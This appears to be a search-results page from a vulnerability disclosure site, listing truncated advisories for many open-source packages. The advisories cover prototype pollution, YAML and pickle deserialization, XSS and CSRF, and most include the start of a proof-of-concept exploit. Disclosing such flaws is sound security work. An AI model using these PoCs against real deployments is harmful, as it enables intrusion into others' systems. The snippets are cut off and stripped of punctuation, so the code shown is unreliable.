4072 matches found
Prototype Pollution in react-atomic/react-atomic-organism
Description set-object-value is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var setObjectValue = require"set-object-value" var obj = console.log"Before : " + .polluted; setObjectValueobj, 'proto','polluted', 'Yes! Its Polluted'; console.log"Afte...
Prototype Pollution in x-extends/xe-utils
Description xe-utils is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'xe-utils' console.log'Before: ', .polluted set, 'proto.polluted', true console.log'After: ', .polluted 2. Execute the following commands in the...
Code Injection in facebookresearch/parlai
Description ParlAI pronounced “par-lay” is a python framework for sharing, training and testing dialogue models, from open-domain chitchat to VQA Visual Question Answering. Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Run exploit.p...
Code Injection in archivy/archivy
Description Archivy is a self-hosted knowledge repository that allows you to safely preserve useful content that contributes to your knowledge bank. Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Run exploit.py python import os...
Code Injection in baidu/cup
Description CUP, common useful python-lib. Currently, Most popular python lib in baidu Vulnerability description untrusted loading of data by the pickle.load function leading to Arbitrary code execution. Proof of Concept Run exploit.py import os import pickle os.system'pip3 install cup' from...
Code Injection in spotify/postgresql-metrics
Description Tool that extracts and provides metrics on your PostgreSQL database Vulnerability description unsafe loading of data by the yaml.load function leading to Arbitrary code execution. Proof of Concept Vulnerable code part python readconfigdict = yaml.loadf...
Cross-site Scripting (XSS) - Generic in kekingcn/kkfileview
Description kkFileView this package is vulnerable to Stored Cross-Site Scripting XSS. https://github.com/kekingcn/kkFileView Steps To Reproduce-: stored XSS 1 install https://github.com/kekingcn/kkFileView locally or https://file.keking.cn/index use demo 2 while uploading files for preview use js...
in catalyst-team/catalyst
Description Catalyst is a PyTorch framework for Deep Learning research and development. It focuses on reproducibility, rapid experimentation, and codebase reuse so you can create something new rather than write another regular train loop. This package was vulnerable to Arbitrary code execution vi...
Prototype Pollution in robinvdvleuten/shvl
Description shvl is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Sensitive Information Disclosure/Denial of ServiceDoS/Remote Code Execution. Proof of...
Prototype Pollution in ionicabizau/obj-def
Description obj-def is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var objDef = require"obj-def" var obj = console.log"Before : " + .polluted; objDefobj, "proto", .polluted ='Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the...
Code Injection in uber/petastorm
Description Petastorm is an open source data access library developed at Uber ATG. This library enables single machine or distributed training and evaluation of deep learning models directly from datasets in Apache Parquet format. Petastorm supports popular Python-based machine learning ML...
Prototype Pollution in darrenpaulwright/object-agent
Description object-agent is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js import set from 'object-agent'; var obj = console.log"Before : " + .polluted; setobj, 'proto.polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute th...
Prototype Pollution in rodrigocmoreira/sgt-fields
Description sgt-fields is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var sgtFields = require"sgt-fields" var obj = console.log"Before : " + .polluted; sgtFields.setobj,"proto.polluted","Yes! Its Polluted"; console.log"After : " + .polluted; 2...
Prototype Pollution in yowainwright/common-utilities
Description @common-utilities/merge-objects is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var a = require"@common-utilities/merge-objects" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " +...
Code Injection in tensorflow/models
Description Arbitrary Code Execution in Tensorflow/Models. The TensorFlow Model Garden is a repository with a number of different implementations of state-of-the-art SOTA models and modeling solutions for TensorFlow users. We aim to demonstrate the best practices for modeling so that TensorFlow...
Prototype Pollution in bonnevoyager/nested-objects-util
Description nested-objects-util is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var unflatten = require"nested-objects-util" console.log"Before : " + .polluted; unflatten"proto.polluted": "Yes! Its Polluted" console.log"After : " + .polluted; 2...
Code Injection in svaarala/duktape
Description Arbitrary Code Execution in svaarala/duktape/tools/genconfig.py. Duktape - embeddable Javascript engine with a focus on portability and compact footprint. Genconfig is a Process Duktape option metadata and produce various useful outputs. Technical Description This package was...
Code Injection in mozilla/deepspeech
Description Arbitrary Code Execution in mozilla/DeepSpeech. DeepSpeech is an open source embedded offline, on-device speech-to-text engine which can run in real time on devices ranging from a Raspberry Pi 4 to high power GPU servers. Technical Description This package was vulnerable to Arbitrary...
Cross-site Scripting (XSS) - Generic in netlify/netlify-cms
Description netlify-cms-widget-markdown is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce 1. Use the application or use the demo https://cms-demo.netlify.com//collections/posts/new 2. Switch to markdown mode in editor. 3. Insert the xss payload in to the editorbody 4. XSS payload will...
Prototype Pollution in patrickleet/expand-keys
Description expand-keys is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var expandKeys = require"expand-keys" console.log"Before : " + .polluted; expandKeys"proto.polluted": "Yes! Its Polluted" console.log"After : " + .polluted; 2. Execute the...
Code Injection in apolloauto/apollo
Description Arbitrary Code Execution in genprotofile.py in ApolloAuto/Apollo. An open autonomous driving platform. Technical Description This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load in yaml. fix is to be done genprotofile.py Exploit cod...
Code Injection in zqpei/deep_sort_pytorch
Description Arbitrary Code Execution in deepsort built on pytorch. MOT tracking using deepsort and yolov3 with pytorch. Technical Description This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load in yaml. All the scripts importing utils/parser.p...
Code Injection in microsoft/qlib
Description Arbitrary Code Execution in microsoft/qlib. Qlib is an AI-oriented quantitative investment platform, which aims to realize the potential, empower the research, and create the value of AI technologies in quantitative investment. Technical Description This package was vulnerable to...
Code Injection in ultralytics/yolov3
Description Arbitrary Code Execution in ultralytics/yolov3. Yolov3 is a model from Ultralytics. Ultralytics is a U.S.-based particle physics and AI startup with over 6 years of expertise supporting government, academic and business clients. Ultralytics offer a wide range of vision AI services,...
Code Injection in ultralytics/yolov5
Description Arbitrary Code Execution in ultralytics/yolov5. Yolov5 is an Object Detection model from Ultralytics. Ultralytics is a U.S.-based particle physics and AI startup with over 6 years of expertise supporting government, academic and business clients. Ultralytics offer a wide range of visi...
Code Injection in microsoft/nni
Description Arbitrary Code Execution in microsoft/nni. An open source AutoML toolkit for automate machine learning lifecycle, including feature engineering, neural architecture search, model compression and hyper-parameter tuning. Technical Description This package was vulnerable to Arbitrary co...
in nvidia/runx
Description runx is a Deep Learning Experiment Management library by NVIDIA. This package was vulnerable to Arbitrary code execution via Insecure YAML deserialization due to the use of a known vulnerable function load in yaml. repo: https://github.com/NVIDIA/runx Proof of Concept python...
Prototype Pollution in badopcode/nodash
Description ts-nodash is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var merge = require"ts-nodash".Merge const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; mergeobj, payload;...
Cross-site Scripting (XSS) - Generic in apexcharts/apexcharts.js
Description apexcharts is vulnerable to Cross-Site Scripting XSS. Proof of Concept 1. Install the package by following this instruction https://apexcharts.com/docs/installation/ or try the live sandbox here https://codepen.io/apexcharts/pen/xYqyYm 2. Edit JS and insert the XSS payload below in th...
Cross-site Scripting (XSS) - Generic in igniterealtime/openfire-bookmarks-plugin
Description openfire-bookmarks-plugin is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce 1. Download openfire and install https://www.igniterealtime.org/downloads/ 2. Run the server http://localhost:9090/index.jsp 3. Click on "Plugins" http://localhost:9090/plugin-admin.jsp and install...
Prototype Pollution in ionicabizau/obj-unflatten
Description obj-unflatten convert flatten objects in nested ones. This package is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const unflatten = require'obj-unflatten' console.log'Before: ' + .polluted unflatten'proto.polluted':...
Prototype Pollution in ionicabizau/set-or-get.js
Description set-or-get is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var SetOrGet = require"set-or-get"; var obj = console.log"Before : " + .polluted; SetOrGetobj, "proto", .polluted ='Yes! Its Polluted'; console.log"After : " + .polluted; 2...
Cross-Site Request Forgery (CSRF) in strider-cd/strider
Description Strider is an Open Source Continuous Deployment / Continuous Integration platform. It is written in Node.js and Ember.js and uses MongoDB as a backing store. This platform is vulnerable to Cross-Site Request Forgery CSRF. It allows an attacker to take over accounts, privilege...
Prototype Pollution in asaianudeep/deep-override
Description deep-override is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var deepOverride = require"deep-override" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; deepOverrideobj,...
Prototype Pollution in steveukx/properties
Description properties-reader is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC and INI files: // poc.js var propertiesReader = require'properties-reader'; console.log"Before : " + .polluted console.log"Before : " + .polluted1 var properties =...
Prototype Pollution in evangelion1204/multi-ini
Description multi-ini is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC and INI files: // poc.js const ini = require'multi-ini'; console.log"Before : " + .polluted; var content = ini.read'./payload.ini'; console.log"After : " + .polluted; //payload.ini constructor...
Prototype Pollution in mout/mout
Description mout is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var mout = require"mout" var obj = console.log"Before : " + .polluted; mout.object.setobj,'proto.polluted','Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the...
Cross-site Scripting (XSS) - Generic in thirtybees/thirtybees
Description Thirty bees is matured e-commerce solution which once started as a fork of PrestaShop 1.6.1.11 and is still compatible with almost all PS 1.6 modules. Its focus is on stability, correctness and reliability of the rich feature set, to allow merchants to focus on growing their business...
Business Logic Errors in braitsch/node-login
Description node-login is a template for quickly building login systems on top of Node.js & MongoDB. The business logic which updates account details fails to verify if the provided email is associated with another account. Proof of Concept 1. Navigate to /signup and Create two accounts with data...
Prototype Pollution in nodef/extra-object
Description extra-object is vulnerable to Prototype Pollution. This package allows modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var extraObject = require"extra-object" var obj =...
Cross-site Scripting (XSS) - Generic in s-cart/core
Description s-cart is a free e-commerce website project for businesses, built on the Laravel framework. This package is vulnerable to Stored Cross-Site Scripting XSS. https://github.com/s-cart/s-cart https://s-cart.org/about.html Steps To Reproduce-: 1 install https://github.com/s-cart/s-cart...
Code Injection in jadonk/bonescript
Overview BoneScript is a node.js library for physical computing on embedded Linux, starting with support for BeagleBone. Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char in the setDate function. Proof of...
Prototype Pollution in mozilla/node-convict
Description convict is vulnerable to Prototype Pollution. This package allows modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var convict = require"convict"; var obj = ; var config =...
Prototype Pollution in b-heilman/bmoor
Description bmoor is vulnerable to Prototype Pollution. This package allows modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js const bmoor = require'bmoor'; var obj = console.log"Before : " ...
Prototype Pollution in maikelvl/dot-json
Description dot-json is vulnerable to Prototype Pollution. This package allows modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var dotJson = require"dot-json" var myfile = new...
Cross-site Scripting (XSS) - Generic in frappe/charts
Description frappe-charts is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce 1. Open NPM repo https://www.npmjs.com/package/frappe-charts 2. Open the Explore demos https://frappe.io/charts 3. At the bottom find the sandbox Ref:...
Prototype Pollution in imrefazekas/assign.js
Description assign.js is vulnerable to Prototype Pollution. This package allows modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var Assigner = require"assign.js" var assigner = new Assign...
Prototype Pollution in okunishinishi/node-objnest
Description objnest is vulnerable to Prototype Pollution. This package allows modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var objnest = require"objnest" console.log"Before : " +...
Prototype Pollution in generates/generates
Description @generates/merger is vulnerable to Prototype Pollution. This package allows modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var merger = require"@generates/merger" const paylo...
Prototype Pollution in jquense/yup
Description yup is vulnerable to Prototype Pollution. This package allows modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js let yup = require'yup'; const payload =...